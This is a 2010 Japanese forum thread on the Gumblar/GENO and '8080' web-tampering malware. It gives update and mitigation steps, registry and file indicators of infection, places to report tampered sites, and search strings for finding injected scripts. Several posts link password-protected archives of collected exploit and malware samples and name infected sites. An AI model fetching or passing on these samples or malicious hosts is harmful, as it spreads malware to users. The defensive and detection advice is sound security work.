【Gumblar/GENO】Web改竄ウイルス総合スレ3【8080】

このエントリーをはてなブックマークに追加
1名無しさん@お腹いっぱい。
改竄されたWebページを経由して感染するウイルスの情報・対策スレです

ウイルス情報・対策方法・脆弱性情報などをお願いします
一部のウイルス被害が増加して混乱するようなら別スレを立てて誘導してください

現時点でGumblar(GENO)、8080(『/*LGPL*/』『/*GNU GPL*/』『/*CODE1*/』)
JustExploitなどのインジェクションが流行しています
基本的な対策としてセキュリティ・アップデートを欠かさないようにしましょう

*** 危険と思われるサイトのアドレスはそのまま貼らないで「.」を「●」に変えてください ***
*** 感染した場合はクリーンインストールと安全なPCからのパスワードの変更を推奨します ***

【前スレ】
【Gumblar/GENO】Web改竄ウイルス総合スレ2【8080】
http://pc11.2ch.net/test/read.cgi/sec/1263055073/
【関連スレ】
GENOウイルススレ ★23
http://pc11.2ch.net/test/read.cgi/sec/1259607683/
2名無しさん@お腹いっぱい。:2010/01/18(月) 22:51:00 BE:512044733-PLT(19200)
【脆弱性を利用されやすいソフトウェア】
下記については必ずアップデートしてください
使用していないものはアンインストール推奨です

■ Windows Update / Microsoft Updateを更新
・XP以下は念のためMicrosoft Updateに変更してアップデートする
■ Adobe Reader(Acrobat,Acrobat Reader)を更新 (使っていないならアンインストール)
ttp://get.adobe.com/jp/reader/
・インストール後本体をアップデート
 ヘルプ → アップデートの有無をチェック
・Acrobat Javascriptをオフにする
 編集 → 環境設定 → Javascript → 「Acrobat Javascriptを使用」のチェックを外す
■ Adobe Flash Playerを更新 (動画サイト見てるなら絶対入ってる。IE版、Firefox等の非IE版に注意!)
ttp://get.adobe.com/jp/flashplayer/
ttp://www.adobe.com/jp/shockwave/download/alternates/#fp
・Flash Playerのバージョン確認
ttp://www.adobe.com/jp/software/flash/about/
ttp://www.adobe.com/jp/support/flashplayer/ts/documents/tn_15507.htm
■ Adobe Shockwave Playerを更新 (最近は使わないはずなのでアンインストール)
ttp://www.adobe.com/jp/shockwave/download/alternates/#sp
■ Java Runtime Environmentを更新 (Javascriptとは違うので注意)
ttp://www.java.com/ja/
・Javaのバージョン確認
ttp://www.java.com/ja/download/installed.jsp
■ QuickTimeを更新 (メールアドレスの入力は不要。使っていないならアンインストール)
ttp://www.apple.com/jp/quicktime/download/
■ RealPlayerを更新 (使っていないならアンインストール)
ttp://jp.real.com/?mode=basic
3名無しさん@お腹いっぱい。:2010/01/18(月) 22:51:22 BE:796514227-PLT(19200)
【アップデート支援ツール】
■ アプリケーションの脆弱性確認ツール
・MyJVN バージョンチェッカ
ttp://jvndb.jvn.jp/apis/myjvn/
・Secunia Personal Software Inspector (PSI)
ttp://secunia.com/vulnerability_scanning/personal/
■ Adobeの“Flash”と“Reader”のアップデートを半自動化「Flash_Reader_Update」
ttp://www.forest.impress.co.jp/docs/review/20091020_323014.html
ttp://hide9999.web.fc2.com/
4名無しさん@お腹いっぱい。:2010/01/18(月) 22:52:09 BE:1365451283-PLT(19200)
【Gumblar.x / Daonol(新GENO)ウイルスについて】
■ Gumblar被害拡大中(1)(2)(3)
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2092
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2093
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2094
■ Windowsが起動しないときの復旧方法の一例
黒い画面にマウスカーソル (Win32/Daonol)
ttp://blogs.technet.com/jpsecurity/archive/2009/10/23/3288625.aspx
Win32/Daonolの亜種に感染!セーフモードでも起動できないパソコンを復旧するには?
ttp://itpro.nikkeibp.co.jp/article/COLUMN/20091028/339633/?ST=security&P=1
レジストリの修復 Windowsを使わずに修復してみる
ttp://pctrouble.lessismore.cc/boot/recover_registry.html
■ 感染確認・駆除ツール
アンラボ(v3daonol.exe)
ttp://www.ahnlab.co.jp/download/vdn_list.asp
マカフィー(stinger.exe)
ttp://www.mcafee.com/japan/mcafee/support/announcement20091127.asp
Kaspersky(KatesKiller.exe)
ttp://support.kaspersky.com/faq/?qid=208280701

【旧Gumblar(GENO)ウイルスのまとめなど】
*** 【注意!】2009年10月からのGumblar.x / Daonol(新GENO)には無効な情報があります ***
■ Anubisレポート
ttp://anubis.iseclab.org/?action=result&task_id=1890669b0bd937574e5be45e24c63ea80&format=html
■ GENOウイルスまとめ
ttp://www29.atwiki.jp/geno/
5名無しさん@お腹いっぱい。:2010/01/18(月) 22:52:37 BE:1536132593-PLT(19200)
【8080系ウイルスについて】
メディアなどでは「ガンブラー(の亜種)」と紹介されていますが
Gumblar系とは別種のウイルスで、最近のものはページソースの最後あたりに
<script>/*LGPL*/
<script>/*GNU GPL*/
<script>/*CODE1*/
などから始まる難読化したスクリプトが埋め込まれています
2009年12月現在、最新版のAdobe Readerおよびそれ以前の脆弱性を利用しているため
回避策としてAcrobat Javascriptのチェックを外してください
修正版の配布は2010年1月13日の予定です
他にもMicrosoftとJRE(Java Runtime Environment)の脆弱性を
利用していますがこちらはアップデートで対処できます
感染すると他のウイルスなどを呼び込むため非常に危険です
■ 新手の正規サイト改ざんでAdobe Readerのゼロデイ攻撃〜今すぐ対策を
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2106
■ 感染確認(2000,XP)
あくまで現時点での確認方法であることに注意してください

セーフモードから起動してレジストリエディタでRunエントリ
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
から
"sysgif32"="C:\\WINDOWS\\TEMP\\~TMD.tmp"
"~TM6.tmp"="C:\\WINDOWS\\TEMP\\~TM6.tmp"
等の登録があれば感染済

上記の登録情報を削除した上で
C:\Documents and Settings\ユーザー名\スタート メニュー\プログラム\siszyd32.exe
のファイルを削除すれば復旧しますが、亜種等で違うこともあるので
可能な限りクリーンインストール&サイト持ちは
安全なPCからのパスワードの変更を推奨します
6名無しさん@お腹いっぱい。:2010/01/18(月) 22:53:00 BE:2048177366-PLT(19200)
GENO(Gumblar)ウイルス対処法。

行っておくべき事項を箇条書きにしました。
細かなことは他にもいろいろありますが、とりあえず以下を実施して下さい。

(1)Microsoft Update(Windows Update)を実行しシステムを最新の状態にする
(2)Adobe Readerを最新版に更新する
(3) Adobe ReaderのAcrobat JavaScriptを無効に設定
(4) JRE(Java Runtime Environment)を最新版に更新する
(5) Flash Playerを最新版に更新する
(6) QuickTimeを最新版に更新する

(1)〜(4)を行っていれば、現時点で改ざんサイトを閲覧してもウイルスには感染しない。
攻撃コードは変化する可能性もあるので、念のため全て行っていただきたい。
Adobe Readerなどのアップデート方法については下記のトピックスを参照のこと。
Acrobat JavaScriptを無効にする方法は以下の通り。

(1)Adobe Readerを起動し[編集]メニューの[環境設定]を選択
(2)「分類」の中の「JavaScript」を選択
(3)「Acrobat JavaScriptを使用」のチェックをクリア
(4)「OK」ボタンを押す


※サイトを運営されている方は、さらに次のことも実施していただきたい。

(1)管理サイトのページなどに意味不明な文字列が埋め込まれていないか確認する
(2)改ざんされていたり、サイト管理に使うパソコンからウイルスが見つかった場合には、
ウイルスに感染していないパソコンを使用して管理サイトのパスワードを変更する
7名無しさん@お腹いっぱい。:2010/01/18(月) 22:53:28 BE:682725762-PLT(19200)
危険ポートを閉じることでセキュリティを強化する。

【ポート135の役割】
Windows2000/XPは、標準で分散オブジェクト技術(以下:DCOM)を利用しています。
このDCOMを利用すると、他のPCのDCOMソフトを遠隔操作できます。
遠隔操作をする場合に、相手PCに問い合わせをする時のに使用するのがポート135です。
場合によっては、遠隔操作をされてしまう可能性があるものですので、このポートは停止しておきましょう。

ポート番号「135」、「リモート管理・操作等のサービスへのアクセス」
■ポート135を閉じる
「コントロールパネル」 -> 「管理ツール」 -> 「サービス」 -> 「Remote Procedure Call」を選択する。
「Remote Procedure Call (RPC) エンド ポイント マッパーや各種の RPC サービスを提供します。」
をダブルクリックし、プロパティを開く。
スタートアップの種類を「無効」にし、OKボタンをクリックしプロパティ画面を閉じる。
変更をしたらPCを再起動する。

ポート番号「445」、「ファイル共有等のサービスへのアクセス」
■ポート445を閉じる
「コントロールパネル」 ->「システム」 ->「ハードウェア」 ->「デバイスマネージャ」の「表示」メニューから
「非表示のデバイスドライバの表示」を選ぶと「プラグアンドプレイではないドライバ」という項目が一覧に加わる。
このツリーを展開して「NetBIOS over TCP/IP」のプロパティを開く。
ここで「ドライバ」タグを選択し、「スタートアップ」の種類を「無効」にする。
変更をしたらPCを再起動する。

ポート135 445
ttp://www.google.com/search?hl=ja&q=%E3%83%9D%E3%83%BC%E3%83%88135+445&lr=lang_ja
8名無しさん@お腹いっぱい。:2010/01/18(月) 22:55:41 BE:1194769973-PLT(19200)
【感染確認方法】
msconfigでスタートアップにsiszyd32.exeとTMD.tmpがあったらご愁傷様(感染確定)

削除はネットワークから切り離して、セーフモードで起動させ
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"sysgif32"="C:\\WINDOWS\\TEMP\\~TMD.tmp"
削除
※sysgif32で検索

C:\Documents and Settings\ユーザー名\スタート メニュー\プログラム\siszyd32.exe
ファイルを削除
9名無しさん@お腹いっぱい。:2010/01/18(月) 22:58:17 BE:910300782-PLT(19200)
以上テンプレ

随時訂正(修正)お願いします
10名無しさん@お腹いっぱい。:2010/01/18(月) 23:00:30
>>1>>9 お疲れです
11名無しさん@お腹いっぱい。:2010/01/18(月) 23:06:26
>>5
>>8
○ C:\Documents and Settings\ユーザー名\スタート メニュー\プログラム\スタートアップ\siszyd32.exe
× C:\Documents and Settings\ユーザー名\スタート メニュー\プログラム\siszyd32.exe
12名無しさん@お腹いっぱい。:2010/01/18(月) 23:12:06
【改ざんWebサイトの届出先】
■ JPCERT コーディネーションセンター (JPCERT/CC)
ttps://www.jpcert.or.jp/
・Web サイト改ざんに関する情報提供のお願い
ttp://www.jpcert.or.jp/pr/2010/pr100001.txt
・インシデントの届出
ttps://form.jpcert.or.jp/
・記入例
ttp://www.jpcert.or.jp/pr/2010/form.png
■ Google Safe Browsing: Report a Malware Page
ttp://www.google.com/safebrowsing/report_badware/
13名無しさん@お腹いっぱい。:2010/01/18(月) 23:12:07
>>1乙です。

■専ブラで右クリからの検索を有効にする方法。
設定例:JaneView

設定>基本>機能>コマンド欄で
コマンド名 任意の名前
実行するコマンドに 任意のURL
を記載して追加。終わったら「よろし」をクリック。
これで設定完了。

これで専ブラから検索でチェックできるようになります。

以下がそのコマンドの一例になります。
Gumblar Checker2=http://genochk.crz.jp/index.php?url=$LINK&hids=on&code=on&chk=AUTO
aguse.net サイト情報検索=http://www.aguse.net/result1.php?url=$LINK
飛び先のチェック=http://www.kakiko.com/check/?$LINK
WebGetterでソースを見る=http://rd.or.tp/get.php?site=$LINK&act=view
WebGetterでタグを除去してソースを見る=http://rd.or.tp/get.php?site=$LINK&act=strip
WebGetterでリンクを抽出する=http://rd.or.tp/get.php?site=$LINK&act=link
14名無しさん@お腹いっぱい。:2010/01/18(月) 23:18:11 BE:1572825-2BP(1236)
>>13
Dan's View Sourcelでソースを見る=http://www.dan.co.uk/viewsource/index.php?url=$LINK
15名無しさん@お腹いっぱい。:2010/01/19(火) 00:24:51
Gumblar
Exploit・本体まとめ 〜2010/01/18
ttp://labs-uploader.sabaitiba.com/virus/download/1263827976.7z
PASS:virus
16名無しさん@お腹いっぱい。:2010/01/19(火) 02:01:35
Gumblar
Exploit・本体まとめ 〜2010/01/19
ttp://labs-uploader.sabaitiba.com/virus/download/1263833996.7z
PASS:virus

一件追加されました
17名無しさん@お腹いっぱい。:2010/01/19(火) 07:13:30
ttp://kanpou.sub●jp/
さっきaguseで検出できないとおもったらそんなことは無かったけど
ちょっとかわってるので
http://www.virustotal.com/jp/analisis/5714e32c201ceb5eb8773e51840d53fc1b1bd5f8e12016b87607d00cb1e13d6d-1263852301
でもカスペルスキーはスルーしてたのか
18名無しさん@お腹いっぱい。:2010/01/19(火) 11:34:58
これって新コードでしか?
tp://www.bing.com/search?q=%22document.write%28unescape%28%22+%22hp_d00%28unescape%28%22&go=&form=QBLH&filt=all
検索ワード:"document.write(unescape(" "hp_d00(unescape("

↓アクセス注意↓
tp://pastebin●com/m52cca06b
tp://9jan010-1320●free4r●com/jb●htmlなどなど。
19名無しさん@お腹いっぱい。:2010/01/19(火) 11:46:20
ここにURL貼り付ける人はhttpまで全部消してくれると助かる
専ブラによってはht抜いた程度じゃリンクしちゃうからTOPに自動で飛ばすページだとURLによっては踏む可能性がある
20名無しさん@お腹いっぱい。:2010/01/19(火) 11:53:28
>>18の//よりあと(wwwから)が直リンされてるからhttp抜いても無駄じゃね?
素人じゃないんだから踏まなきゃいいんだよ
21名無しさん@お腹いっぱい。:2010/01/19(火) 11:54:43
つーか●使えって書いてあんだろ
22名無しさん@お腹いっぱい。:2010/01/19(火) 11:57:19
>>21
あんたが正しい
23名無しさん@お腹いっぱい。:2010/01/19(火) 12:00:47
genius.jpn●org
ノートン先生に祭り上げられてるから見てみたら
Trojan-Downloader.JS.Agent.ewo反応
のソースチェッカーで見たら明らかに一番下に変なソースが入っているからGENOっぺぇお
24名無しさん@お腹いっぱい。:2010/01/19(火) 12:16:39
>>13
headerを取得=http://fula.jp/cgi-bin/head/?url=$TEXT$LINK
headerとソースとスクリーンショットを取得=http://fula.jp/cgi-bin/head2/?url=$TEXT$LINK
Dr.WEB=http://online.drweb.com/result?url=$TEXT$LINK
Mcafee SiteAdvisorでリンク先をチェック=http://siteadvisor.pl/lookup/?q=$TEXT$LINK
Google セーフ ブラウジング診断ページ=http://www.google.com/safebrowsing/diagnostic?site=$LINK
25名無しさん@お腹いっぱい。:2010/01/19(火) 12:34:20
前スレに貼られてたこれアスクルだよね?だいぶやばくね?

ttp://www.askulnet●com/
26名無しさん@お腹いっぱい。:2010/01/19(火) 12:39:01
「いわゆるGENO系ウイルスに感染してみた」シリーズが面白かったw
27名無しさん@お腹いっぱい。:2010/01/19(火) 12:51:36
>>25
アスクル本体とはちゃうけどね
28名無しさん@お腹いっぱい。:2010/01/19(火) 12:54:09
>>25
アスクル、アスクルアリーナの代理店だそうだ
29名無しさん@お腹いっぱい。:2010/01/19(火) 13:05:27
感染した
30名無しさん@お腹いっぱい。:2010/01/19(火) 13:06:26
>>20
クリックする気が無いところでクリックしてしまったり、マウスポインタが意図せず動いたりしたことはない?
タッチパッド使ってるし、踏めないようになってると安心なんだけど
31名無しさん@お腹いっぱい。:2010/01/19(火) 13:34:43
タッチパッドなら誤クリックもありそうだな
図面や絵を扱ってるとタッチパッドじゃ仕事にならないから使わないが
32名無しさん@お腹いっぱい。:2010/01/19(火) 13:43:32
面倒でもマウスを繋ぎなさいってこった
33名無しさん@お腹いっぱい。:2010/01/19(火) 13:44:45
専ブラでURL踏んだときはわんくっしょん噛むようになってるし
34名無しさん@お腹いっぱい。:2010/01/19(火) 13:49:02
踏んでも感染先に飛ばないように●つかってるんじゃん
35名無しさん@お腹いっぱい。:2010/01/19(火) 14:08:51
>>34
たまに直リンしちゃって騒いでる人がおるがなw
36名無しさん@お腹いっぱい。:2010/01/19(火) 14:14:21
>>33
その設定Janeでできる?
37名無しさん@お腹いっぱい。:2010/01/19(火) 14:27:24
>>16
乙です
38名無しさん@お腹いっぱい。:2010/01/19(火) 14:31:06
>>36
ごめん俺少数派のゾヌ2なのよね
普通はワンクッション切ってる人のが多そうだしな

何で開くか選択する画面が出るんだわ
ゾヌか規定のブラウザか簡易ビューアか?みたいな
39名無しさん@お腹いっぱい。:2010/01/19(火) 14:36:57
40名無しさん@お腹いっぱい。:2010/01/19(火) 14:41:33
>>38
その機能いいなあ
41名無しさん@お腹いっぱい。:2010/01/19(火) 14:41:59
立派なお名前なのに感染してるとガッカリ感がパネエ
42名無しさん@お腹いっぱい。:2010/01/19(火) 14:43:22
>>36
おもいきってブラウザ指定のパスに存在しないファイル名を書いておくとかすると
開かないようになる・・・かな??
43名無しさん@お腹いっぱい。:2010/01/19(火) 14:43:23
>>36
JaneViewなら
設定→機能→「画像で全拡張子をビューアで処理」にチェック
44名無しさん@お腹いっぱい。:2010/01/19(火) 14:43:31
>>39
探偵屋の元締め?
裏情報いっぱいありそうで流出やばくね?
45名無しさん@お腹いっぱい。:2010/01/19(火) 14:44:00
ゾヌは至れり尽くせりの多機能だが重いぞ〜w
46名無しさん@お腹いっぱい。:2010/01/19(火) 14:44:45
あと、ブラウザのパスにlynxを指定するとか
47名無しさん@お腹いっぱい。:2010/01/19(火) 14:48:06
>>42
それをテキストファイルに指定してる
踏むなとか書いた
48名無しさん@お腹いっぱい。:2010/01/19(火) 14:49:52
http://blog.fc2.com/info/blog-entry-531.html
FC2が注意喚起をした

>■ 危険防止について
>二次感染、三次感染を防ぐためにも、下記の点にご注意ください。

> * Windows Update を行う
> * Adobe Acrobat 及び Adobe Reader を最新にする
> * Adobe Flash Player を最新にする
> * Java Applet や ActiveX の設定を OFF にする
> * 見覚えのない怪しいリンクは開かない
> * ウィルス対策ソフトをインストールする
> * ウイルス定義ファイルを更新する

んん〜
49名無しさん@お腹いっぱい。:2010/01/19(火) 14:51:48
>>47
ちょっとやってみる
いいかも
50名無しさん@お腹いっぱい。:2010/01/19(火) 14:55:44
■Gumblar&Gumblar.x
現在冬眠中だが、ひっそり動いてるかもしれない

■8080系(巷ではGumblar亜種と呼ばれている)
/*GNU GPL*/:進化して/*LGPL*/になった。
/*CODE1*/:現在進化中につき要注意。
世界各地で毎日絶賛バージョンアップ中w
※/*CODE1*/(新型?)の検索は
検索ワード:"document.write(unescape(" "hp_d00(unescape("
注:GoogleよりBingのほうが絞り込める

■何故かスルーされる亜種っぽいやつ
<script>function〜:8080系の亜種?
検索ワード:"<script>function" "return String.fromCharCode(c);" "getElementById("
※ちまちま増えてるから注意が必要
51名無しさん@お腹いっぱい。:2010/01/19(火) 14:59:01
52名無しさん@お腹いっぱい。:2010/01/19(火) 15:25:15
アスクル代理店 株式会社丸吉 現状メンテナンス中
53名無しさん@お腹いっぱい。:2010/01/19(火) 15:30:01
>>52
がんばれ〜 JSファイルにまだあるよー
54名無しさん@お腹いっぱい。:2010/01/19(火) 15:51:22
+にスレ立ってるね
NHKのソースで
55名無しさん@お腹いっぱい。:2010/01/19(火) 15:57:20
>>39
カスペだと、↓こんなん出ました

社団法人日本調査業協会

2010/01/19 15:51:40 検出しました: HEUR:Trojan-Downloader.Script.Generic  http://www●nittyokyo●or●jp/
56名無しさん@お腹いっぱい。:2010/01/19(火) 16:03:51
>>46
テキストブラウザ良いな。
俺はもっとマイナーなHTML2にしている。
57名無しさん@お腹いっぱい。:2010/01/19(火) 16:37:26
>>39
マカはトロイと反応しました。
58名無しさん@お腹いっぱい。:2010/01/19(火) 16:38:57
AVGはノーガード戦法
59名無しさん@お腹いっぱい。:2010/01/19(火) 16:58:42
おい
重複してんぞ
どうなってんだ
60名無しさん@お腹いっぱい。:2010/01/19(火) 17:29:08
tp://gamble●xrea●jp/
URLで吹いたwww
61名無しさん@お腹いっぱい。:2010/01/19(火) 17:32:04
Squid Proxy Server を経由してネットを使っています。推奨されるブロックの方法を
おでん授頂ければと思います。
62名無しさん@お腹いっぱい。:2010/01/19(火) 17:34:35
>>61
だいこん、白滝、餅入り巾着
63名無しさん@お腹いっぱい。:2010/01/19(火) 17:38:07
牛筋オヌヌメ
64名無しさん@お腹いっぱい。:2010/01/19(火) 17:52:22
関東に住むまで竹輪麩を知らなかった
65名無しさん@お腹いっぱい。:2010/01/19(火) 17:52:24
>61
玉子と大根とからしがあればご飯何杯でもいける!
66名無しさん@お腹いっぱい。:2010/01/19(火) 17:54:56
おでんには味噌だ
67名無しさん@お腹いっぱい。:2010/01/19(火) 17:56:53
===== 以下おでん雑談スレ =====
68名無しさん@お腹いっぱい。:2010/01/19(火) 17:59:14
以上にしといたれよw
69名無しさん@お腹いっぱい。:2010/01/19(火) 18:15:53
やっぱり サボテンだろ
70名無しさん@お腹いっぱい。:2010/01/19(火) 18:17:46
===== 以上今日の晩ご飯雑談スレ ====
71名無しさん@お腹いっぱい。:2010/01/19(火) 18:18:19
サボテンのサラダは意外にいける<これマジ
72名無しさん@お腹いっぱい。:2010/01/19(火) 18:21:43
>>71
酸っぱくね?>サボテン
73名無しさん@お腹いっぱい。:2010/01/19(火) 18:23:50
>>39
一日に300アクセスあるそうです
日本の探偵業の方々感染してるかも
74名無しさん@お腹いっぱい。:2010/01/19(火) 18:25:56
>>73
300って少ないだろ・・・
75名無しさん@お腹いっぱい。:2010/01/19(火) 18:27:14
すげー時代
76名無しさん@お腹いっぱい。:2010/01/19(火) 18:50:30
今気づいたけど
ギャンブラー(ばくちうち)は、gamblerで
ガンブラーはgumblarだったんだな。
77名無しさん@お腹いっぱい。:2010/01/19(火) 18:50:54
300だと個人サイトでも「ああそうですか」レベルだよなー
被害者も少なくていいわけだが
78名無しさん@お腹いっぱい。:2010/01/19(火) 18:51:04
>>72
物によるな
アロエは苦いけど美味いよ
79名無しさん@お腹いっぱい。:2010/01/19(火) 18:51:08
>>76 なんという豆w
80名無しさん@お腹いっぱい。:2010/01/19(火) 18:54:50
>>78
アロエは蜂蜜に漬ければなんとか食えるな
身体によさげ
81名無しさん@お腹いっぱい。:2010/01/19(火) 18:58:00
あまり関係ないが、Gumblar Checker2だけど
IE8で互換性表示offで見るとIEが動作停止するのは俺だけ?
82名無しさん@お腹いっぱい。:2010/01/19(火) 19:00:25
>81
自分もだ。
何度も何度も何度も何度も何度も何度m
途切れて見られない。
でも、入力したサイトによるんだよね。何でかな。
83名無しさん@お腹いっぱい。:2010/01/19(火) 19:01:42
Noscriptあれば負ける気しねえ
84名無しさん@お腹いっぱい。:2010/01/19(火) 19:04:55
>>83
なぁ
85名無しさん@お腹いっぱい。:2010/01/19(火) 19:08:07
Noscriptは作者の守銭奴っぷりがウザい。
86名無しさん@お腹いっぱい。:2010/01/19(火) 19:11:06
ありゃ守銭奴とはいわんだろ
87名無しさん@お腹いっぱい。:2010/01/19(火) 19:16:51
乞食だよな(失笑)
88名無しさん@お腹いっぱい。:2010/01/19(火) 19:24:10
この前一年ぶりぐらいで入れてみたら相変わらず自サイトに誘導しやがったんで速攻消したわ。
謝罪はしても反省はしないような人間なんだろうな。
そんなにまでして広告収入が欲しいのかね?
89名無しさん@お腹いっぱい。:2010/01/19(火) 19:27:45
>>88
設定で変えれるだろ
90名無しさん@お腹いっぱい。:2010/01/19(火) 19:39:20 BE:804681784-PLT(12031)
>>81,82
申し訳ございません。
ハイライト表示に使っているSyntaxHighlighterの一部機能がIE8と相性が悪いようで、この機能を無効にすることで修正しました
91名無しさん@お腹いっぱい。:2010/01/19(火) 19:47:25
>90
うわ、作者様!さすが対応素早い、ありがとう!
こちらこそものすごくお世話になってます。
92名無しさん@お腹いっぱい。:2010/01/19(火) 20:13:36
ロッテのトップページ、Gamblar Checker2で改ざんって出た
93名無しさん@お腹いっぱい。:2010/01/19(火) 20:21:10
http://www.amuse.co.jp/

違うかな?
94名無しさん@お腹いっぱい。:2010/01/19(火) 20:21:35
社団法人日本調査業協会

修正してあるけどお知らせ無しですか
95名無しさん@お腹いっぱい。:2010/01/19(火) 20:22:27
>>92
出ないよ。
96名無しさん@お腹いっぱい。:2010/01/19(火) 20:25:59
>>94
その立場にしてコンプライアンス無視
いいねえ〜w
97名無しさん@お腹いっぱい。:2010/01/19(火) 20:31:42
>>94
人の事は調査するけども自分のことを調査されるのは嫌いですってか
98名無しさん@お腹いっぱい。:2010/01/19(火) 20:32:54
>95
ごめん見方間違えた、「改ざんされた可能性があります」ってのはサイトの本文か。
ほんとに検出されたら「表示しない」って出るんだね。
ロッテさんみなさん、失礼。
99名無しさん@お腹いっぱい。:2010/01/19(火) 20:47:40
白痴ランドが出てくるってがいしゅつ?
100名無しさん@お腹いっぱい。:2010/01/19(火) 20:50:43
なにそれ
101名無しさん@お腹いっぱい。:2010/01/19(火) 20:51:22
http://tsushima.2ch.net/test/read.cgi/newsplus/1263850547/1
情報セキュリティのラック|LAC
http://www.lac.co.jp/
ttp://spysee.jp/%E6%96%B0%E4%BA%95%E6%82%A0
ttp://www.lac.co.jp/special/arai200807-01.html

専門家と称する方にお願い。事後に語るより
事前にウイルスの万延を防いで欲しいものです。。
102名無しさん@お腹いっぱい。:2010/01/19(火) 21:09:51
>>16の書庫に入ってるMalwareってのが本体なのか?
103名無しさん@お腹いっぱい。:2010/01/19(火) 21:09:51
そりゃ無理だ。現物が出てこねーと話にならん。
104名無しさん@お腹いっぱい。:2010/01/19(火) 21:54:20
>>101
IE以外にしてjavascriptをきればいい
105名無しさん@お腹いっぱい。:2010/01/19(火) 21:56:53
全然ダメだな
106名無しさん@お腹いっぱい。:2010/01/19(火) 22:06:06
この手のGumblar系ウィルスって、どうして改竄したサイトから
撒布サイトに対してリダイレクトさせるんだろう?

改竄できるくらいなら、そのサイトに直接ウィルスを置けるのに。

あえてワンクッション入れるのには何か意味あるの?
107名無しさん@お腹いっぱい。:2010/01/19(火) 22:08:21
>>104
なんでIEは駄目なの?
108名無しさん@お腹いっぱい。:2010/01/19(火) 22:09:21
ウイルス本体を鯖に置くと鯖の対ウイルス装置に即検出される
109名無しさん@お腹いっぱい。:2010/01/19(火) 22:10:09
規制されているから手短に。

h++p://anian.just-size●net/
Wepawetによると8080にやられてるっぽい。
AntiVir PersonalではJS/Agent.Bay.1で検出。
110名無しさん@お腹いっぱい。:2010/01/19(火) 22:13:40
>>107
中国でIEが標的になってpwが盗まれたらしいよ。
111名無しさん@お腹いっぱい。:2010/01/19(火) 22:20:54
6だけな
112名無しさん@お腹いっぱい。:2010/01/19(火) 22:23:44
>>109
menu.js
/*LGPL*/
113名無しさん@お腹いっぱい。:2010/01/19(火) 22:45:48
>>112
copy.jsも
114名無しさん@お腹いっぱい。:2010/01/19(火) 22:54:14
攻撃されたのは6だけだが、同じ脆弱性は5以外6・7・8みんなもっているぜ
115名無しさん@お腹いっぱい。:2010/01/19(火) 22:58:50
>>109
通販のメアドにめるしたお。
116名無しさん@お腹いっぱい。:2010/01/19(火) 23:04:36
>>115
ありがとう。こっちはJPCERT/CCにインシデント報告しておきました。
JPCERTが具体的に何をするのかはわかりませんが。
117名無しさん@お腹いっぱい。:2010/01/19(火) 23:46:39
改竄されるファイルは
index.html
index.htm
index.php
*.js
↑の他もある?
118名無しさん@お腹いっぱい。:2010/01/19(火) 23:50:26
最強のウイルス対策
1 2階に上がる
2  パソコンを持つ
3  思いっきり投げ捨てる これでおk
119名無しさん@お腹いっぱい。:2010/01/19(火) 23:52:14
鯖管には法律上の罰則が必要だな
120名無しさん@お腹いっぱい。:2010/01/19(火) 23:54:02
>>119
誰も鯖缶しなくなるぞ。
121名無しさん@お腹いっぱい。:2010/01/19(火) 23:59:00
exploit/本体まとめ 第七版
ttp://labs-uploader.sabaitiba.com/virus/download/1263912888.zip

鼬ごっこってレベルじゃねーぞ(AA略
122名無しさん@お腹いっぱい。:2010/01/20(水) 00:04:06
もうボロボロじゃんか
なにやってんだ馬鹿ヤロー
123名無しさん@お腹いっぱい。:2010/01/20(水) 00:09:18
>>110
レスd
124名無しさん@お腹いっぱい。:2010/01/20(水) 00:12:04
>>121
virustotalにおくっといた
125名無しさん@お腹いっぱい。:2010/01/20(水) 00:14:44
>>121
いつも乙です

ところで、どうやってそれだけの検体を?本体マルウェアとか
126名無しさん@お腹いっぱい。:2010/01/20(水) 00:23:46
>>125
「地雷を‘実際に踏んで’回収」
127名無しさん@お腹いっぱい。:2010/01/20(水) 00:23:54
>>123
IE6、IE7、IE8それぞれに脆弱性が存在する。
IE6は即アウトだがIE7、IE8はデータ実行防止DEPを有効にすれば一応凌げる。
IE7は詳細設定から「オンラインからの攻撃の緩和に役立てるため、メモリ保護を有効にする」 をクリック。
IE8はディフォでデータ実行防止DEPが有効。
128名無しさん@お腹いっぱい。:2010/01/20(水) 00:31:14
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄」
―――――――――――――‐┬┘
                        |         >>118
       ____.____    | .__     いらないPCを
     |        |        |   | |\_\     窓から投げ捨てろ
     |        | ∧_∧ |   | |  |.◎.|
     |        |( ´∀`)つ ミ | |  |.: |
     |        |/ ⊃  ノ |   | .\|.≡.|
        ̄ ̄ ̄ ̄' ̄ ̄ ̄ ̄    |    ̄ ̄
129名無しさん@お腹いっぱい。:2010/01/20(水) 00:36:57
>>128
          ,,-'  _,,-''"      "''- ,,_   ̄"''-,,__  ''--,,__
           ,,-''"  ,, --''"ニ_―- _  ''-,,_    ゞ    "-
          て   / ,,-",-''i|   ̄|i''-、  ヾ   {
         ("  ./   i {;;;;;;;i|    .|i;;;;;;) ,ノ    ii
     ,,       (    l, `'-i|    |i;;-'     ,,-'"   _,,-"
     "'-,,     `-,,,,-'--''::: ̄:::::::''ニ;;-==,_____ '"  _,,--''"
         ̄"''-- _-'':::::" ̄::::::::::::::::;;;;----;;;;;;;;::::`::"''::---,,_  __,,-''"
        ._,,-'ニ-''ニ--''" ̄.i| ̄   |i-----,, ̄`"''-;;::''-`-,,
      ,,-''::::二-''"     .--i|     .|i          "- ;;:::`、
    ._,-"::::/    ̄"''---  i|     |i            ヽ::::i
    .(:::::{:(i(____         i|     .|i          _,,-':/:::}
     `''-,_ヽ:::::''- ,,__,,,, _______i|      .|i--__,,----..--'''":::::ノ,,-'
       "--;;;;;;;;;;;;;;;;;""''--;;i|      .|i二;;;;;::---;;;;;;;::--''"~
               ̄ ̄"..i|       .|i
                 .i|        |i
                 i|        |i
                 .i|          .|i
                .i|           |i
               .i|      ,,-、 、  |i
               i|      ノ::::i:::トiヽ、_.|i
           _,,  i|/"ヽ/:iヽ!::::::::ノ:::::Λ::::ヽ|i__n、ト、
